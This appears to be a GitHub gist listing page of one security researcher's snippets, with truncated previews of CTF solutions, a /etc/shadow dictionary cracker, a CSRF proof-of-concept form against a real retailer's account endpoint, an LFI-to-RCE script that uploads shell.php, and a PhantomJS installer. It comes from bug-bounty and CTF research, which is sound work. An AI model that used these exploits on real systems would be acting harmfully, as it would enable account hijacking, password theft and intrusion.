Skip to content

Instantly share code, notes, and snippets.

View aadityapurani's full-sized avatar
🎯
Focusing

Aaditya Purani aadityapurani

🎯
Focusing
158 followers · 0 following
View GitHub Profile
@aadityapurani
aadityapurani / level3.py
Last active May 1, 2017 01:33
Solution for HackerRank CTF (level 3)
'''
Level 3 HackerRank Solution by Aaditya Purani
Input:
https://cdn.hackerrank.com/hackerrank/static/contests/capture-the-flag/infinite/qds.html
1000
https://cdn.hackerrank.com/hackerrank/static/contests/capture-the-flag/infinite/
'''
from bs4 import BeautifulSoup
from sets import Set
import urllib2
@aadityapurani
aadityapurani / level2.py
Created May 1, 2017 01:24
Solution for HackerRank CTF (Level 2)
'''
Solved by Aaditya Purani (@aaditya_purani)
Just a Proof of Concept
$python level2.py > kek
$cat kek | sort
'''
import json
import requests
list=[]
@aadityapurani
aadityapurani / shadowcracker.py
Last active November 18, 2017 02:40
#/etc/shadow Bruteforcer
#Coded by Aaditya Purani
#Just for Fun after Remote Exploitation
#It will crack shadow password by Dictionary attack
import optparse
import crypt
def checkPass(cryptPass, dname):
salt = "$"+cryptPass.split('$')[1]+"$"+cryptPass.split('$')[2]
@aadityapurani
aadityapurani / beats_csrf.html
Created July 20, 2016 09:00
<html>
<!-- CSRF PoC - By Aaditya Purani -->
<body>
<form method='POST' action="https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer">
<input type="hidden" name="firstName" value="hacked" />
<input type="hidden" name="lastName" value="hackerone" />
<input type="hidden" name="emailAddress" value="victimsemail@gmail.com" />
<input type="hidden" name="zip" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="csrf_token" value="VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91" />
@aadityapurani
aadityapurani / lfi-rce.py
Created June 30, 2016 08:25
Local File Inclusion to Remote Code Execution, I just fixed the code of Dustri's and implementated it to Practically run.
#Remote Code Execution from LFI
#Programmed by Aaditya Purani (https://twitter.com/aaditya_purani)
#Fixed bug in Inital Dustri's code and Implemented to run practically
import itertools
import requests
import sys
import string
print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
@aadityapurani
aadityapurani / phantom.sh
Created June 30, 2016 03:15
Phantom JS Dowloader Bash Script. Run it as a root user.
cd /usr/local/share
sudo wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-x86_64.tar.bz2
sudo tar xjf phantomjs-1.9.8-linux-x86_64.tar.bz2
sudo ln -s /usr/local/share/phantomjs-1.9.8-linux-x86_64/bin/phantomjs /usr/local/share/phantomjs
sudo ln -s /usr/local/share/phantomjs-1.9.8-linux-x86_64/bin/phantomjs /usr/local/bin/phantomjs
sudo ln -s /usr/local/share/phantomjs-1.9.8-linux-x86_64/bin/phantomjs /usr/bin/phantomjs